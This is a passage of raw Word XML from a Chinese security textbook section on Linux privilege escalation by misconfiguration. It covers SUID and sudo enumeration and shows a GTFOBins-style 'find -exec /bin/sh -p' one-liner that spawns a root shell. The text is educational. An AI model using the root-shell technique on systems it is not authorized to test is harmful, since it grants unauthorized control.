      <w:r>
        <w:t xml:space="preserve"> ③ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">概念范畴，本节着重讨论第一类——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">配置错误驱动的提权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，即利用系统管理员留下的“后门”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">枚举方法论：系统性地寻找权限缺口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拿到低权限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后的第一步，不是盲目尝试提权，而是在目标系统上进行系统性的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提权枚举（Privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Escalation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeration）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。这相当于攻击者在问系统一系列问题：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“你有哪些本不该让我用的高权限入口？”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。以下是标准的枚举维度及其背后的权限模型原理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">文件枚举</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID（Set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> User </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID）是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Unix </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限模型中的经典机制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①：当一个可执行文件的权限位中设置了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod u+s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）时，任何用户执行该文件时，进程的有效</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将变为该文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">属主</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UID，而非执行者本身的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UID。例如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属主为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并设置了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位，普通用户执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时，该进程以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限运行，从而能够修改只有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可写的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件。SUID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">机制本身是必要的，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">过度使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">危险程序的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则构成提权入口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">枚举命令</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①（命令语法为通用标准，但输出结果因系统而异</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-perm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-4000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> f </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此命令从根目录开始查找所有具有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位（权限八进制表示为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4000）的普通文件，并将错误信息重定向到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以保持输出干净。预期输出是一系列绝对路径，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/pkexec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等。攻击者需要审视每一个找到的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二进制文件，判断其是否存在被滥用的可能——这正是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GTFOBins（一个社区维护的“合法二进制提权滥用”知识库）的核心思想</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②：许多系统自带的合法程序（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">less</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">awk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），如果被设置了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root，就可以通过其内置的功能（执行外部命令、写入文件、读取文件等）实现提权。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">例如，如果枚举发现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">具有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限，可以利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-exec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选项提权：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/sh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-quit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数指示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">保留有效</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UID，从而获得一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell。需要强调的是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GTFOBins </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">所列的利用路径依赖于“该二进制已被设为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">root”这一前提条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，这一条件是否成立完全取决于目标系统的具体配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②，不同的靶机、不同的发行版、不同的管理员决策都会导致枚举结果不同。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">配置枚举</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Do）是现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统中更推荐的权限提升机制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①：它通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/sudoers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件（及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/sudoers.d/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录下的配置文件）定义哪些用户或用户组可以以哪个身份执行哪些命令。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的优点是粒度可控（可以精确到“用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只能以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/systemctl restart apache2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">”，且不允许执行其他命令），并且所有操作均有日志记录。然而，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">过于宽松的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">同样构成提权入口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">枚举命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">该命令列出当前用户被允许执行的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则。请注意，如果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置要求验证密码，该命令会提示输入当前用户的密码；但在某些场景下（如通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> webshell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获得的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能无法提供交互式终端），可能需要尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或其它方式。预期输出类似（具体内容完全取决于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/sudoers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置，为环境相关值</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
